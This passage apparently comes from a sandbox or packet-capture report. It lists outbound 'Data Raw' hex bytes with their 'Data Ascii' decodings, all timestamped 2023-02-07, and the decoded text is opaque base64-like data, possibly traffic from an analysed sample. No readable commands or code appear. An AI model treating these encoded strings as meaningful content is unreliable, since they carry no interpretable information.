                                                                                                                                                                                                              Data Ascii: oj80Bi7b5wVDrCQHIhNYeA2BwQ2FZ7jfIJUzaCwgh1ni4XpGzoa5HJB4pBULvcSpYkAj6G1YEgoFR9K3vASM061/l492HAiS7qeNwXJVo+2h8GjqJp/75GKrMW1FP/mo1GaFeaTCN7k1zsDBnPnjnW6p1tXiTjsMsIxvD6O3yHAuOSug/ejsykwSQu8/CY56AoNlTCCXJJeNPgB088R9OuPDLODHaJUylIOg3EkMJMrunSqdS23wXGoyGHdrOHQ
                                                                                                                                                                                                              2023-02-07 18:52:31 UTC13267OUTData Raw: 68 45 64 54 46 65 46 73 39 2b 66 5a 69 48 34 63 64 6b 54 34 6c 4b 78 44 51 59 6a 6d 2f 4e 46 35 31 35 33 47 45 30 70 69 4d 32 5a 51 37 78 59 37 44 67 78 36 59 47 48 72 65 65 34 46 64 6b 54 4f 51 66 2f 48 41 39 76 51 56 74 4a 49 6f 35 44 75 6c 4f 59 4c 6b 4a 61 6f 4a 46 71 45 4b 64 56 68 44 76 68 33 6e 72 61 46 36 6c 46 5a 47 39 46 71 49 79 66 6f 41 4e 41 71 54 5a 76 56 56 6b 4d 47 37 78 36 63 4d 50 44 44 46 4f 5a 4b 77 6d 30 6b 31 4d 56 42 49 47 51 46 78 63 33 44 4d 4a 6a 71 58 2f 45 72 6c 6a 42 38 78 7a 53 4f 54 79 58 4b 51 66 77 67 45 54 74 49 4b 6a 4d 35 45 59 2b 79 79 50 52 33 72 43 59 39 65 69 53 33 49 77 4f 6c 31 37 4d 57 68 79 76 75 45 53 4f 37 33 54 37 6c 79 6f 78 6c 7a 2f 31 43 4d 32 6b 43 6a 50 44 63 2f 74 73 31 47 6a 57 6f 4f 74 33 30 71 38 38
                                                                                                                                                                                                              Data Ascii: hEdTFeFs9+fZiH4cdkT4lKxDQYjm/NF5153GE0piM2ZQ7xY7Dgx6YGHree4FdkTOQf/HA9vQVtJIo5DulOYLkJaoJFqEKdVhDvh3nraF6lFZG9FqIyfoANAqTZvVVkMG7x6cMPDDFOZKwm0k1MVBIGQFxc3DMJjqX/ErljB8xzSOTyXKQfwgETtIKjM5EY+yyPR3rCY9eiS3IwOl17MWhyvuESO73T7lyoxlz/1CM2kCjPDc/ts1GjWoOt30q88
                                                                                                                                                                                                              2023-02-07 18:52:31 UTC13283OUTData Raw: 6a 45 77 45 47 43 62 32 71 6b 49 4a 38 6c 30 54 36 53 6b 4b 5a 52 6d 6e 38 47 45 32 42 35 62 61 7a 4f 4c 69 73 4c 4e 43 66 47 61 58 61 65 36 33 52 35 68 78 47 59 65 41 58 64 48 4b 73 64 74 34 7a 43 6b 50 36 31 48 30 72 4c 51 65 43 63 77 70 64 50 74 7a 42 38 46 70 44 43 56 4c 46 51 58 73 56 32 6e 63 69 53 37 39 31 6c 37 48 37 66 41 4d 75 6a 49 49 62 4a 77 75 4a 62 6c 58 4f 55 79 31 55 77 6b 67 30 38 30 68 74 54 48 5a 51 6c 35 6c 55 48 71 50 79 4c 53 6d 32 4d 66 79 47 79 43 32 41 63 4d 75 53 67 51 52 75 6b 36 43 71 7a 55 39 39 4f 57 67 4e 56 6d 45 41 79 48 31 54 39 49 51 6a 4e 59 50 49 38 71 73 73 59 44 78 69 62 59 43 55 39 4f 5a 73 70 5a 58 65 7a 59 4b 4a 59 67 77 33 78 4b 51 64 75 39 6c 35 66 4b 4e 42 35 71 79 43 62 4b 73 56 4c 5a 41 4a 75 6d 6f 49 45 66
                                                                                                                                                                                                              Data Ascii: jEwEGCb2qkIJ8l0T6SkKZRmn8GE2B5bazOLisLNCfGaXae63R5hxGYeAXdHKsdt4zCkP61H0rLQeCcwpdPtzB8FpDCVLFQXsV2nciS791l7H7fAMujIIbJwuJblXOUy1Uwkg080htTHZQl5lUHqPyLSm2MfyGyC2AcMuSgQRuk6CqzU99OWgNVmEAyH1T9IQjNYPI8qssYDxibYCU9OZspZXezYKJYgw3xKQdu9l5fKNB5qyCbKsVLZAJumoIEf
                                                                                                                                                                                                              2023-02-07 18:52:31 UTC13299OUTData Raw: 35 4a 67 51 65 66 51 79 50 73 34 73 5a 4d 53 69 48 39 7a 2b 70 33 63 45 6d 31 42 4c 32 69 46 4b 39 5a 4e 2b 6f 4f 6e 33 4e 79 53 48 44 68 71 58 4a 4c 58 4c 37 6d 67 32 70 4a 4b 75 6a 73 4a 78 59 48 41 65 4a 73 73 30 49 76 6b 72 33 76 49 45 51 39 4a 52 77 78 54 2b 47 38 4c 70 64 63 35 4e 5a 45 55 56 69 54 31 75 56 34 44 42 43 78 64 46 6c 55 38 57 44 6d 48 4c 79 44 4d 36 51 79 78 78 63 55 42 78 43 78 78 44 76 76 34 73 36 6a 69 35 4b 46 78 30 35 43 76 48 6b 37 55 51 70 2f 61 75 73 2b 47 2b 37 50 4c 46 64 70 67 4b 50 33 61 2b 4c 50 43 54 45 41 50 54 6d 61 6f 73 50 68 6d 69 69 44 6b 38 6e 67 56 37 56 4b 48 77 57 6c 55 36 76 75 6f 2f 57 57 6d 61 63 49 77 44 49 55 31 59 6e 35 65 54 4f 79 65 7a 74 6b 56 4b 34 57 69 2f 39 42 50 34 58 51 33 5a 47 46 65 4a 76 4c 52
                                                                                                                                                                                                              Data Ascii: 5JgQefQyPs4sZMSiH9z+p3cEm1BL2iFK9ZN+oOn3NySHDhqXJLXL7mg2pJKujsJxYHAeJss0Ivkr3vIEQ9JRwxT+G8Lpdc5NZEUViT1uV4DBCxdFlU8WDmHLyDM6QyxxcUBxCxxDvv4s6ji5KFx05CvHk7UQp/aus+G+7PLFdpgKP3a+LPCTEAPTmaosPhmiiDk8ngV7VKHwWlU6vuo/WWmacIwDIU1Yn5eTOyeztkVK4Wi/9BP4XQ3ZGFeJvLR
                                                                                                                                                                                                              2023-02-07 18:52:31 UTC13315OUTData Raw: 77 67 4a 59 49 77 59 4b 73 51 31 63 63 6c 55 6b 67 44 38 4d 34 55 4c 39 62 48 30 4a 61 55 47 37 75 54 32 39 53 59 6e 46 35 4b 72 62 62 62 2b 43 66 42 36 41 62 61 31 2b 59 56 59 6f 57 51 55 59 46 73 61 45 73 75 4e 38 39 5a 62 69 78 44 6f 68 4d 73 67 7a 56 73 5a 43 65 2b 48 41 2f 6f 31 72 31 39 75 71 41 67 64 70 44 42 57 55 4c 36 51 30 71 78 69 30 79 41 52 44 76 57 38 6b 53 47 48 30 73 6e 42 36 66 39 6f 63 69 38 6d 49 34 41 6b 39 42 30 70 32 44 46 56 49 36 69 2b 55 4c 2f 65 78 6f 44 37 55 2b 69 5a 49 31 42 43 30 30 30 64 38 32 56 55 78 74 78 69 32 2b 4c 4f 78 6a 59 72 63 35 6d 56 6e 79 47 38 6c 76 6a 54 71 67 68 55 4a 45 5a 73 54 51 47 6d 4c 47 36 78 59 4e 41 72 33 4c 62 30 52 56 47 78 74 49 44 45 47 4e 4a 78 59 4f 77 6d 45 42 4b 51 7a 4f 76 6e 4b 37 73 4e
                                                                                                                                                                                                              Data Ascii: wgJYIwYKsQ1cclUkgD8M4UL9bH0JaUG7uT29SYnF5Krbbb+CfB6Aba1+YVYoWQUYFsaEsuN89ZbixDohMsgzVsZCe+HA/o1r19uqAgdpDBWUL6Q0qxi0yARDvW8kSGH0snB6f9oci8mI4Ak9B0p2DFVI6i+UL/exoD7U+iZI1BC000d82VUxtxi2+LOxjYrc5mVnyG8lvjTqghUJEZsTQGmLG6xYNAr3Lb0RVGxtIDEGNJxYOwmEBKQzOvnK7sN
                                                                                                                                                                                                              2023-02-07 18:52:31 UTC13331OUTData Raw: 63 46 50 61 6f 51 61 6a 6a 68 37 38 50 6f 79 62 64 71 48 69 64 39 50 75 44 69 4c 53 6a 34 2b 72 33 38 6b 4c 66 6e 46 44 71 37 39 37 45 57 34 64 72 37 32 63 50 75 2f 73 65 2f 49 51 61 4d 64 43 61 31 54 6e 76 65 43 66 30 4a 66 2f 55 62 46 74 4b 51 5a 61 72 62 65 64 49 45 56 65 55 74 6b 6c 66 53 56 37 4e 77 73 41 7a 58 58 68 75 64 63 42 2f 4c 5a 4a 68 74 79 4b 4d 59 4b 42 34 54 71 68 6f 62 33 6c 4a 4a 76 4a 71 4b 36 38 6a 47 72 5a 32 51 37 71 33 48 4b 4f 2f 54 2f 4f 53 58 4e 47 33 38 61 58 76 68 55 4b 72 66 57 32 45 43 7a 35 5a 70 30 43 67 2b 38 66 79 4f 38 77 32 34 4c 42 51 63 56 69 6d 4e 57 77 6f 68 75 49 73 44 4a 73 2f 47 6a 70 6d 4a 56 52 73 5a 65 30 35 4b 64 38 4d 74 43 33 52 47 36 72 59 61 48 6d 70 37 53 6f 70 51 4d 51 6a 33 55 56 63 71 77 70 57 52 47
                                                                                                                                                                                                              Data Ascii: cFPaoQajjh78PoybdqHid9PuDiLSj4+r38kLfnFDq797EW4dr72cPu/se/IQaMdCa1TnveCf0Jf/UbFtKQZarbedIEVeUtklfSV7NwsAzXXhudcB/LZJhtyKMYKB4Tqhob3lJJvJqK68jGrZ2Q7q3HKO/T/OSXNG38aXvhUKrfW2ECz5Zp0Cg+8fyO8w24LBQcVimNWwohuIsDJs/GjpmJVRsZe05Kd8MtC3RG6rYaHmp7SopQMQj3UVcqwpWRG
                                                                                                                                                                                                              2023-02-07 18:52:31 UTC13347OUTData Raw: 41 45 72 4d 65 32 57 69 63 4c 67 54 30 77 45 4c 70 71 30 66 55 4b 4a 33 62 30 48 37 69 31 33 44 64 38 4e 71 35 63 4f 59 6c 79 6d 6b 6a 50 33 44 58 4a 55 4b 36 73 34 56 6d 4e 2b 6c 6b 73 39 43 44 35 79 6c 5a 37 75 54 43 4d 46 4e 32 4c 64 63 59 58 4a 4f 6f 76 41 7a 75 4e 34 47 4e 6f 58 50 35 30 4b 2b 53 45 73 4e 32 34 68 5a 4f 2f 75 52 6c 67 46 72 55 7a 63 39 6b 41 61 70 4f 4b 61 57 4f 55 61 7a 79 4a 67 5a 72 55 56 4a 32 79 33 4e 2b 6c 44 43 4d 4c 59 56 49 33 74 75 47 51 62 2f 6e 2b 76 65 51 6a 59 7a 6c 6d 68 78 2f 56 2f 6b 6f 32 2f 44 7a 4e 51 57 6b 54 33 65 43 71 70 30 75 6f 38 31 4d 41 32 6f 66 6f 54 79 2b 42 63 52 64 41 4a 6e 30 75 6a 30 4f 71 4a 63 79 64 70 6d 52 69 56 77 6e 77 47 50 70 38 77 79 4a 57 79 57 46 32 37 4c 64 79 51 4c 71 55 64 58 75 62 39
                                                                                                                                                                                                              Data Ascii: AErMe2WicLgT0wELpq0fUKJ3b0H7i13Dd8Nq5cOYlymkjP3DXJUK6s4VmN+lks9CD5ylZ7uTCMFN2LdcYXJOovAzuN4GNoXP50K+SEsN24hZO/uRlgFrUzc9kAapOKaWOUazyJgZrUVJ2y3N+lDCMLYVI3tuGQb/n+veQjYzlmhx/V/ko2/DzNQWkT3eCqp0uo81MA2ofoTy+BcRdAJn0uj0OqJcydpmRiVwnwGPp8wyJWyWF27LdyQLqUdXub9
                                                                                                                                                                                                              2023-02-07 18:52:31 UTC13363OUTData Raw: 6d 32 6c 54 76 76 36 4a 74 50 63 6d 47 46 75 45 43 71 57 30 75 4d 6c 50 71 34 37 49 73 51 72 52 58 41 57 64 34 61 46 41 6b 66 58 5a 46 32 76 5a 37 49 61 42 6e 46 6a 50 4f 48 51 48 47 6f 34 4c 73 6a 34 6f 54 6f 78 58 4b 4d 49 2f 33 42 63 46 56 7a 53 36 62 76 31 42 38 6c 62 71 4c 5a 35 58 4e 78 30 78 57 6d 6d 33 30 68 70 69 55 55 38 39 6a 6d 64 77 68 4e 4e 71 46 47 58 69 37 55 72 53 67 79 36 78 54 6f 65 48 76 65 63 59 4f 63 64 53 6f 57 49 46 72 4b 42 61 69 32 39 63 5a 5a 79 2b 4d 5a 55 55 39 30 33 6d 52 31 6b 36 65 51 7a 2b 49 6d 77 35 61 6f 49 36 32 6a 54 4d 31 57 65 73 57 6a 38 61 75 49 33 52 6f 30 53 2f 70 52 2b 4a 6b 55 34 34 6d 53 47 58 72 35 4f 64 51 4d 52 66 44 6a 53 6f 78 42 74 30 31 69 6a 2f 52 4b 56 41 70 31 6a 49 6a 32 2b 71 32 32 2b 65 51 31 59
                                                                                                                                                                                                              Data Ascii: m2lTvv6JtPcmGFuECqW0uMlPq47IsQrRXAWd4aFAkfXZF2vZ7IaBnFjPOHQHGo4Lsj4oToxXKMI/3BcFVzS6bv1B8lbqLZ5XNx0xWmm30hpiUU89jmdwhNNqFGXi7UrSgy6xToeHvecYOcdSoWIFrKBai29cZZy+MZUU903mR1k6eQz+Imw5aoI62jTM1WesWj8auI3Ro0S/pR+JkU44mSGXr5OdQMRfDjSoxBt01ij/RKVAp1jIj2+q22+eQ1Y
                                                                                                                                                                                                              2023-02-07 18:52:31 UTC13379OUTData Raw: 52 66 79 6f 30 69 67 34 42 78 67 72 55 79 68 74 51 53 61 67 41 33 57 42 53 35 52 52 34 35 59 72 4f 52 79 38 36 73 37 66 42 6c 6c 74 4f 4f 59 48 58 73 35 4a 58 78 69 6f 38 57 38 71 51 76 6d 38 4c 48 38 6a 4f 6e 4d 7a 64 6f 47 66 5a 48 46 57 45 78 78 70 2b 44 49 58 75 4b 75 48 65 56 32 7a 78 6b 64 33 54 7a 71 49 54 35 75 79 30 52 67 4d 59 65 57 69 4b 73 61 5a 47 37 66 63 52 6e 44 4c 34 37 4b 35 79 64 35 6d 38 6d 65 49 4a 71 30 52 51 75 38 62 42 2f 30 6b 52 43 42 7a 35 6c 50 6e 61 76 49 55 2b 51 37 71 63 51 4d 33 44 68 56 77 4f 67 78 4d 67 77 6b 63 6b 52 51 7a 70 49 42 31 56 61 53 44 6b 6c 61 48 6c 63 5a 47 6c 36 71 37 48 58 68 56 76 64 2f 52 4a 71 52 39 43 48 49 7a 71 38 35 6b 61 6e 44 71 4e 5a 79 74 61 50 78 56 63 75 53 79 37 61 76 52 78 46 75 57 69 65 4f
                                                                                                                                                                                                              Data Ascii: Rfyo0ig4BxgrUyhtQSagA3WBS5RR45YrORy86s7fBlltOOYHXs5JXxio8W8qQvm8LH8jOnMzdoGfZHFWExxp+DIXuKuHeV2zxkd3TzqIT5uy0RgMYeWiKsaZG7fcRnDL47K5yd5m8meIJq0RQu8bB/0kRCBz5lPnavIU+Q7qcQM3DhVwOgxMgwkckRQzpIB1VaSDklaHlcZGl6q7HXhVvd/RJqR9CHIzq85kanDqNZytaPxVcuSy7avRxFuWieO
                                                                                                                                                                                                              2023-02-07 18:52:31 UTC13395OUTData Raw: 6d 57 44 74 58 44 55 34 63 4f 39 32 38 67 6e 38 4d 45 77 31 2f 34 4e 50 70 5a 79 31 64 4a 41 71 51 66 66 62 62 34 71 55 43 56 51 50 69 62 31 4d 58 6a 63 72 62 71 4a 30 79 52 37 57 6a 73 64 4b 48 78 4a 52 63 77 4b 71 4a 6f 51 72 6a 4f 4e 32 2b 64 2b 70 67 65 76 78 59 6a 52 43 4f 63 63 64 37 68 6b 63 68 58 74 33 4f 38 37 62 4d 72 72 64 64 66 6f 69 74 6e 52 41 6e 6a 49 70 31 4d 36 42 35 6e 44 77 66 71 4b 6b 4e 4b 4d 76 43 58 50 68 36 41 62 64 74 4c 64 39 79 31 48 70 64 4d 54 65 62 4b 62 50 65 33 67 5a 2f 48 4c 6d 7a 67 4c 54 70 4a 63 57 58 64 2b 63 37 49 54 5a 44 6d 2b 4a 42 2b 6b 62 6e 53 6d 64 35 50 64 44 63 39 4e 37 6c 6c 70 6a 68 34 56 45 43 31 4f 33 35 65 2f 6a 6d 53 35 76 43 36 4b 38 69 41 57 79 36 33 70 37 4d 63 48 4b 46 39 49 4b 7a 59 39 42 42 51 2b
                                                                                                                                                                                                              Data Ascii: mWDtXDU4cO928gn8MEw1/4NPpZy1dJAqQffbb4qUCVQPib1MXjcrbqJ0yR7WjsdKHxJRcwKqJoQrjON2+d+pgevxYjRCOccd7hkchXt3O87bMrrddfoitnRAnjIp1M6B5nDwfqKkNKMvCXPh6AbdtLd9y1HpdMTebKbPe3gZ/HLmzgLTpJcWXd+c7ITZDm+JB+kbnSmd5PdDc9N7llpjh4VEC1O35e/jmS5vC6K8iAWy63p7McHKF9IKzY9BBQ+
                                                                                                                                                                                                              2023-02-07 18:52:31 UTC13411OUTData Raw: 77 59 49 4b 63 69 36 4e 64 47 34 66 77 62 41 6f 4c 6d 76 6d 33 58 37 6e 66 43 79 35 68 6e 6e 32 54 55 6c 38 30 66 32 37 31 2b 7a 61 56 41 47 37 76 68 35 6b 6f 48 47 37 6d 46 34 31 45 4e 53 50 6d 57 39 73 48 35 6c 2b 6c 74 2f 58 52 75 49 34 34 5a 4f 45 54 51 52 43 72 44 31 55 59 59 66 50 45 56 6b 69 34 53 7a 61 51 68 42 58 70 38 48 31 76 77 6d 64 52 6e 37 78 73 58 6c 56 72 2f 73 61 42 54 59 72 7a 53 75 61 35 55 72 6f 36 64 45 4f 36 52 78 44 64 54 49 71 54 31 76 56 4c 77 57 2f 4d 49 6d 77 61 6e 69 2b 33 64 6f 41 64 4d 39 76 64 63 31 59 50 66 6c 43 47 44 77 35 2b 58 2b 77 6d 4e 5a 4b 48 55 39 45 2f 59 6e 42 46 43 57 57 45 46 4c 49 30 4a 6c 72 76 4f 74 52 76 4a 4a 77 57 44 64 72 39 79 79 36 39 54 51 2b 74 64 35 77 69 6f 71 5a 59 33 42 64 4b 6d 6c 74 4b 39 2b
                                                                                                                                                                                                              Data Ascii: wYIKci6NdG4fwbAoLmvm3X7nfCy5hnn2TUl80f271+zaVAG7vh5koHG7mF41ENSPmW9sH5l+lt/XRuI44ZOETQRCrD1UYYfPEVki4SzaQhBXp8H1vwmdRn7xsXlVr/saBTYrzSua5Uro6dEO6RxDdTIqT1vVLwW/MImwani+3doAdM9vdc1YPflCGDw5+X+wmNZKHU9E/YnBFCWWEFLI0JlrvOtRvJJwWDdr9yy69TQ+td5wioqZY3BdKmltK9+
                                                                                                                                                                                                              2023-02-07 18:52:31 UTC13427OUTData Raw: 54 4f 4b 4a 6c 72 66 7a 77 49 4b 63 5a 48 37 69 51 64 6c 6e 4a 36 68 41 4a 53 54 46 50 7a 6f 33 45 6e 2b 74 33 6e 2f 38 38 37 73 42 44 5a 32 71 34 72 42 6b 4c 68 55 55 73 38 53 2f 6f 4b 4b 50 4a 38 5a 39 38 55 42 57 55 41 73 64 76 50 58 39 4e 75 64 6c 69 78 73 38 4f 4b 64 30 52 78 4c 45 41 45 56 75 30 4a 51 55 4e 75 44 71 51 54 68 48 55 45 67 45 68 41 32 4c 63 6c 57 56 4d 77 53 4e 2b 43 6d 51 6c 61 65 6e 6e 2f 6f 65 6a 4d 61 53 42 62 6e 4a 49 6f 35 49 48 56 52 7a 6b 48 50 6b 74 6d 38 48 2f 32 42 4e 4b 61 6d 45 2b 6d 39 6a 50 6c 70 76 54 4a 75 76 4c 68 76 32 2f 69 50 70 35 65 44 56 7a 53 45 72 38 4a 45 56 70 70 74 59 41 43 4b 4d 31 35 64 7a 47 62 34 45 6a 43 41 52 5a 62 51 4e 2f 2b 67 68 55 6a 51 6b 31 41 73 57 45 4e 50 38 33 47 42 58 75 6c 37 77 4e 53 39
                                                                                                                                                                                                              Data Ascii: TOKJlrfzwIKcZH7iQdlnJ6hAJSTFPzo3En+t3n/887sBDZ2q4rBkLhUUs8S/oKKPJ8Z98UBWUAsdvPX9Nudlixs8OKd0RxLEAEVu0JQUNuDqQThHUEgEhA2LclWVMwSN+CmQlaenn/oejMaSBbnJIo5IHVRzkHPktm8H/2BNKamE+m9jPlpvTJuvLhv2/iPp5eDVzSEr8JEVpptYACKM15dzGb4EjCARZbQN/+ghUjQk1AsWENP83GBXul7wNS9
                                                                                                                                                                                                              2023-02-07 18:52:31 UTC13443OUTData Raw: 42 50 61 44 72 52 75 73 4b 6c 62 6b 58 36 43 6e 6c 2b 54 6d 48 4a 36 42 33 73 62 34 6f 66 72 6c 6f 4e 5a 36 6b 2b 46 54 46 63 52 62 69 36 77 4d 43 36 4b 36 63 43 51 32 68 76 4b 46 72 30 52 6d 4c 61 53 68 46 59 44 34 72 55 4a 42 51 35 44 38 72 67 61 74 58 35 4f 69 6c 38 61 4e 63 2b 36 55 54 52 6a 4f 61 69 6c 63 41 63 63 39 7a 6a 6e 55 32 6b 6a 35 6e 4c 4a 38 77 73 57 35 4f 62 32 68 4d 63 42 6d 55 41 6a 2b 75 2b 50 5a 42 44 39 57 4a 78 38 61 42 34 72 4f 76 73 37 5a 59 74 46 42 34 31 5a 73 62 53 65 4c 57 65 41 2b 6d 34 4e 4d 54 59 6a 43 69 61 35 4a 41 62 39 52 6a 4d 41 62 5a 5a 4b 79 55 76 36 31 63 48 47 4c 72 59 6b 50 50 64 57 61 61 77 63 42 6c 39 75 43 6b 4e 31 69 7a 30 44 4d 47 4c 6d 7a 48 56 5a 6d 71 6d 75 4e 41 74 39 65 62 70 42 4f 58 5a 4a 77 31 54 45
                                                                                                                                                                                                              Data Ascii: BPaDrRusKlbkX6Cnl+TmHJ6B3sb4ofrloNZ6k+FTFcRbi6wMC6K6cCQ2hvKFr0RmLaShFYD4rUJBQ5D8rgatX5Oil8aNc+6UTRjOailcAcc9zjnU2kj5nLJ8wsW5Ob2hMcBmUAj+u+PZBD9WJx8aB4rOvs7ZYtFB41ZsbSeLWeA+m4NMTYjCia5JAb9RjMAbZZKyUv61cHGLrYkPPdWaawcBl9uCkN1iz0DMGLmzHVZmqmuNAt9ebpBOXZJw1TE
                                                                                                                                                                                                              2023-02-07 18:52:31 UTC13459OUTData Raw: 62 78 4f 37 36 78 53 41 35 65 6b 47 4e 33 47 79 31 43 4b 65 75 4a 58 70 4a 41 71 31 66 39 71 44 73 41 32 53 6d 44 68 42 68 45 6a 68 4d 42 7a 76 64 78 6e 38 4f 31 65 70 57 4a 31 75 45 54 6f 43 39 35 70 78 67 4e 65 64 61 65 64 7a 43 4f 52 65 57 58 4d 49 2f 47 4a 6e 4b 4d 37 71 35 64 2b 4d 2f 33 74 6a 45 39 31 6e 78 6d 39 61 68 49 67 2b 49 48 41 55 6e 67 63 6b 43 4a 6f 46 7a 2b 69 58 78 32 77 4d 62 39 61 67 31 5a 52 51 4e 48 73 6f 35 52 74 66 45 6c 68 47 4d 32 68 73 72 78 43 39 41 74 7a 62 47 67 66 42 64 4e 47 37 37 72 6a 77 37 68 4f 6b 44 52 52 6d 4c 5a 36 32 56 54 4f 37 57 63 4c 4a 44 38 4a 4a 59 44 41 54 32 32 30 63 75 65 64 54 47 59 66 52 49 6a 68 46 4b 31 6f 2b 6d 32 43 49 72 50 41 65 57 45 39 51 74 44 6b 4f 79 35 52 41 68 4c 52 46 76 67 78 44 5a 61 51
                                                                                                                                                                                                              Data Ascii: bxO76xSA5ekGN3Gy1CKeuJXpJAq1f9qDsA2SmDhBhEjhMBzvdxn8O1epWJ1uEToC95pxgNedaedzCOReWXMI/GJnKM7q5d+M/3tjE91nxm9ahIg+IHAUngckCJoFz+iXx2wMb9ag1ZRQNHso5RtfElhGM2hsrxC9AtzbGgfBdNG77rjw7hOkDRRmLZ62VTO7WcLJD8JJYDAT220cuedTGYfRIjhFK1o+m2CIrPAeWE9QtDkOy5RAhLRFvgxDZaQ
                                                                                                                                                                                                              2023-02-07 18:52:31 UTC13475OUTData Raw: 56 35 6f 46 4c 61 51 31 33 4c 54 61 68 54 58 6d 56 32 6a 75 35 7a 4c 52 71 70 58 77 63 53 51 56 46 61 59 65 53 4b 47 5a 62 6b 36 50 33 2b 73 53 66 6c 4f 52 46 32 62 74 44 42 49 77 7a 57 39 72 6e 45 53 46 42 52 42 74 31 57 49 66 70 44 37 67 63 67 4b 6e 75 79 6d 7a 6a 71 59 35 4b 4f 54 57 74 6a 64 39 59 4c 69 44 4a 49 76 58 66 42 59 34 7a 65 4c 43 33 35 50 70 44 75 6c 55 52 6e 41 69 62 34 32 52 61 58 33 76 57 54 30 58 52 65 33 51 77 64 50 4a 32 2f 69 6b 63 77 7a 52 6c 64 76 62 36 32 48 73 4b 31 4b 57 38 6e 56 6a 2b 6b 77 54 4a 50 68 32 71 44 57 62 32 67 6f 6f 4f 41 6d 6d 6e 2f 2f 41 6e 67 53 5a 48 52 51 53 6a 6c 37 48 51 2f 79 34 43 6f 75 32 42 61 34 6c 39 35 49 4e 72 51 4b 69 52 78 74 39 4c 36 33 38 64 70 37 64 2b 68 66 47 65 37 72 61 2f 2b 4e 45 47 37 38
                                                                                                                                                                                                              Data Ascii: V5oFLaQ13LTahTXmV2ju5zLRqpXwcSQVFaYeSKGZbk6P3+sSflORF2btDBIwzW9rnESFBRBt1WIfpD7gcgKnuymzjqY5KOTWtjd9YLiDJIvXfBY4zeLC35PpDulURnAib42RaX3vWT0XRe3QwdPJ2/ikcwzRldvb62HsK1KW8nVj+kwTJPh2qDWb2gooOAmmn//AngSZHRQSjl7HQ/y4Cou2Ba4l95INrQKiRxt9L638dp7d+hfGe7ra/+NEG78
                                                                                                                                                                                                              2023-02-07 18:52:31 UTC13491OUTData Raw: 6e 76 77 6d 4c 6b 78 79 79 55 61 52 65 39 61 76 4e 74 75 32 2f 59 45 42 37 54 78 42 68 4e 64 66 38 77 33 4b 6f 79 57 68 77 71 31 6a 6f 52 64 30 52 5a 46 48 7a 72 31 30 53 73 56 42 4b 55 59 6f 75 77 61 6f 32 72 75 32 64 77 6c 45 53 64 63 6e 4a 74 4e 70 37 38 36 4e 63 68 65 64 50 72 48 31 65 6a 46 42 58 6c 76 6a 64 48 4c 54 48 62 4b 6e 6e 4e 75 51 45 4f 31 68 57 48 4d 65 4c 2f 36 6d 54 45 63 6d 48 58 42 44 6f 35 44 4a 50 47 6c 30 7a 6c 71 45 4c 70 53 6e 43 48 6e 54 74 6e 63 37 72 31 32 53 70 48 51 63 44 70 52 6e 6e 31 56 6a 67 41 76 73 62 5a 6c 33 46 6e 39 55 68 36 37 77 37 44 6a 6a 69 68 34 48 36 50 55 79 68 57 6c 71 69 71 4c 6d 56 51 67 44 6b 6d 36 56 4b 69 48 66 58 79 77 2f 66 52 7a 72 63 79 31 79 76 68 79 75 50 69 78 66 30 6f 6f 62 65 54 70 69 42 74 4e
                                                                                                                                                                                                              Data Ascii: nvwmLkxyyUaRe9avNtu2/YEB7TxBhNdf8w3KoyWhwq1joRd0RZFHzr10SsVBKUYouwao2ru2dwlESdcnJtNp786NchedPrH1ejFBXlvjdHLTHbKnnNuQEO1hWHMeL/6mTEcmHXBDo5DJPGl0zlqELpSnCHnTtnc7r12SpHQcDpRnn1VjgAvsbZl3Fn9Uh67w7Djjih4H6PUyhWlqiqLmVQgDkm6VKiHfXyw/fRzrcy1yvhyuPixf0oobeTpiBtN
                                                                                                                                                                                                              2023-02-07 18:52:31 UTC13507OUTData Raw: 6b 33 56 75 30 61 70 34 6d 67 34 61 33 73 2f 58 77 70 73 65 35 61 35 45 4c 38 6c 2b 71 73 47 55 58 70 4f 46 4f 35 54 6f 6b 32 4d 31 53 4b 6f 76 6d 55 70 48 2b 54 5a 34 35 55 74 30 4e 33 73 42 4e 4d 7a 4f 63 6a 54 46 4d 45 39 6b 4f 46 75 6c 53 6b 54 61 32 6d 55 44 57 56 7a 4d 32 6b 75 72 63 4d 4e 6c 56 6b 6f 42 75 4e 59 75 35 57 62 42 32 42 45 30 2f 38 54 68 54 73 34 38 31 42 48 32 58 59 31 71 74 77 62 61 71 5a 52 78 78 43 57 64 5a 78 59 71 6e 4c 5a 50 6b 75 53 59 46 6c 4d 79 45 35 54 76 78 79 57 53 4b 41 39 31 52 2f 54 6a 6c 74 46 35 73 38 52 63 34 55 4a 79 68 41 76 6a 41 78 5a 59 62 6d 75 68 39 48 33 56 6e 6b 37 37 2b 43 67 32 6a 66 4a 4f 5a 53 66 66 4d 55 75 50 52 58 58 42 6d 6f 33 43 58 35 43 31 78 61 58 49 42 78 5a 62 71 47 46 30 37 4b 6c 54 50 79 71
                                                                                                                                                                                                              Data Ascii: k3Vu0ap4mg4a3s/Xwpse5a5EL8l+qsGUXpOFO5Tok2M1SKovmUpH+TZ45Ut0N3sBNMzOcjTFME9kOFulSkTa2mUDWVzM2kurcMNlVkoBuNYu5WbB2BE0/8ThTs481BH2XY1qtwbaqZRxxCWdZxYqnLZPkuSYFlMyE5TvxyWSKA91R/TjltF5s8Rc4UJyhAvjAxZYbmuh9H3Vnk77+Cg2jfJOZSffMUuPRXXBmo3CX5C1xaXIBxZbqGF07KlTPyq
                                                                                                                                                                                                              2023-02-07 18:52:31 UTC13523OUTData Raw: 54 54 2f 6d 4b 2b 59 79 54 59 51 49 2f 53 43 35 56 65 39 54 6d 59 46 41 5a 4c 52 50 65 75 42 2f 4b 55 4b 66 45 7a 41 31 71 54 31 42 4d 4c 56 63 47 5a 58 36 72 53 52 6c 50 71 34 73 4b 56 44 4b 4c 32 6a 41 67 7a 61 53 46 75 66 44 69 79 50 74 53 4b 31 4b 48 45 45 61 6d 4a 43 4e 48 74 6a 70 2f 63 62 43 54 6a 4e 6a 72 6e 68 39 68 75 71 58 54 6b 41 55 74 4e 6b 4b 70 55 77 4f 59 64 45 2b 67 52 43 4e 37 30 6a 65 69 34 57 67 59 53 67 32 5a 79 6f 59 45 6a 63 62 7a 4e 37 49 6e 4f 45 34 53 51 48 35 2b 30 4b 74 67 2f 49 47 78 43 41 47 33 42 58 4f 53 71 53 42 2b 5a 43 54 39 47 62 43 4b 2b 47 71 48 46 78 4b 46 6e 35 45 35 43 41 66 73 4d 53 67 6b 7a 76 74 72 41 42 72 41 55 2f 6e 68 4d 30 6f 58 54 4b 74 54 57 55 38 73 42 4b 57 36 54 70 64 63 2b 6b 58 67 79 51 39 58 32 58
